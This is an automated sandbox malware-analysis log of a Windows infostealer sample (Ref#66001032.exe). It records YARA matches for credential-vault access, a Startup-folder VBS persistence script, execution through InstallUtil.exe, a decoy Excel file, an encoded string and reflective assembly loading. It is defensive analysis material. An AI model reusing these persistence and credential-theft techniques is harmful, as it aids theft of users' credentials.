                      Source: 6.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#66001032.exe.444bce8.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: Ref#66001032.exe, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: Length.exe.0.dr, -.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.csCryptographic APIs: 'CreateDecryptor'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 4JJG6X.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 0.2.Ref#66001032.exe.444bce8.6.raw.unpack, 8C78isHTVco.csCryptographic APIs: 'TransformFinalBlock'
                      Source: Ref#66001032.exe, -.csBase64 encoded string: 'icZB75V29O1X/Zx+uctb9J41m8xB/p15tsYJ3JVvn9FG6YlaqcxX9pJ3o4RV/oREnMpe9756t9oJ9IBEk9FX6oV6ttZG4st8v8tt15V1vctaoLd+rutL65VdqNBf05F1vtNXoJd+ruB8+p1+4fZc/5VjldkJyZV6vuxG6Zl1vYRz/5QgvdpGxKB0qdZG8p914dhX769Yr81A/p5vntBf+pl14exX77R6rt4JqMAr44kJ2oNov9JQ94lIv81E/oIgidZf65x+m8xB/p15tsZ344B3tc1X6ct5u91X94Z24cxf9Jt+rtpB7w=='
                      Source: Length.exe.0.dr, -.csBase64 encoded string: 'icZB75V29O1X/Zx+uctb9J41m8xB/p15tsYJ3JVvn9FG6YlaqcxX9pJ3o4RV/oREnMpe9756t9oJ9IBEk9FX6oV6ttZG4st8v8tt15V1vctaoLd+rutL65VdqNBf05F1vtNXoJd+ruB8+p1+4fZc/5VjldkJyZV6vuxG6Zl1vYRz/5QgvdpGxKB0qdZG8p914dhX769Yr81A/p5vntBf+pl14exX77R6rt4JqMAr44kJ2oNov9JQ94lIv81E/oIgidZf65x+m8xB/p15tsZ344B3tc1X6ct5u91X94Z24cxf9Jt+rtpB7w=='
                      Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/108@2/3
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs
                      Source: C:\Users\user\AppData\Roaming\Length.exeMutant created: NULL
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile created: C:\Users\user\AppData\Local\Temp\excel_doc.xlsx
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs"
                      Source: Ref#66001032.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: Ref#66001032.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\Ref#66001032.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: Ref#66001032.exeVirustotal: Detection: 38%
                      Source: Ref#66001032.exeReversingLabs: Detection: 34%
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile read: C:\Users\user\Desktop\Ref#66001032.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\Ref#66001032.exe "C:\Users\user\Desktop\Ref#66001032.exe"
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\AppData\Local\Temp\excel_doc.xlsx"
                      Source: C:\Users\user\Desktop\Ref#66001032.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Length.vbs"
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\Length.exe "C:\Users\user\AppData\Roaming\Length.exe"
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: vcruntime140.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: msvcp140.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: xmllite.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: mlang.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Users\user\Desktop\Ref#66001032.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winsta.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Windows\System32\wscript.exeSection loaded: version.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: slc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\wscript.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: wldp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: profapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: amsi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: userenv.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: msasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: gpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: dnsapi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: winnsi.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rasapi32.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rasman.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rtutils.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: rasadhlp.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: fwpuclnt.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: secur32.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: schannel.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: mskeyprotect.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ntasn1.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ncrypt.dll
                      Source: C:\Users\user\AppData\Roaming\Length.exeSection loaded: ncryptsslp.dll
                      Source: C:\Users\user\Desktop\Ref#66001032.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Ref#66001032.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                      Source: Ref#66001032.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: Ref#66001032.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Ref#66001032.exe, 00000000.00000002.3512089608.0000000005710000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: Ref#66001032.exe, 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3523083171.0000000006220000.00000004.08000000.00040000.00000000.sdmp, Ref#66001032.exe, 00000000.00000002.3486694329.0000000004393000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, cwTvB654OC75eWlmL4Y.cs.Net Code: Type.GetTypeFromHandle(nrZwh8o90W6OiuiGOMY.EJsbs9ljZh(16777354)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(nrZwh8o90W6OiuiGOMY.EJsbs9ljZh(16777253)),Type.GetTypeFromHandle(nrZwh8o90W6OiuiGOMY.EJsbs9ljZh(16777285))})
                      Source: Ref#66001032.exe, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: Length.exe.0.dr, -.cs.Net Code: _E009 System.Reflection.Assembly.Load(byte[])
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#66001032.exe.6220000.11.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#66001032.exe.4343ef0.5.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 0.2.Ref#66001032.exe.4393f10.1.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.42976b0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.6420000.13.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.6420000.13.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.42976b0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.3ddf210.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.3cb45f0.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.Ref#66001032.exe.3b899c8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.3526218119.0000000006420000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000004297000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3469471200.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.3486694329.0000000003934000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: Ref#66001032.exe PID: 2736, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5ED0 push esi; iretd 0_2_026C5ED2
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5F5F push edi; iretd 0_2_026C5F62
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5F58 push edi; iretd 0_2_026C5F5A
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_026C5F5B push edi; iretd 0_2_026C5F5E
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_056F713C push ss; ret 0_2_056F7147
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D6721 push es; iretd 0_2_061D6730
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D241A push esp; iretd 0_2_061D2421
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061D5A93 push es; iretd 0_2_061D5A94
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061EE810 push es; ret 0_2_061EE8C0
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_061E0DB1 push es; iretd 0_2_061E0DB4
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0621CE13 push esi; ret 0_2_0621CE15
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0621AC5F push es; retf 0_2_0621AC70
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06216564 push eax; ret 0_2_0621656D
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_062ED8F2 push es; ret 0_2_062ED900
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_06313E28 push cs; ret 0_2_06313E2E
                      Source: C:\Users\user\Desktop\Ref#66001032.exeCode function: 0_2_0631C61F push es; ret 0_2_0631C645
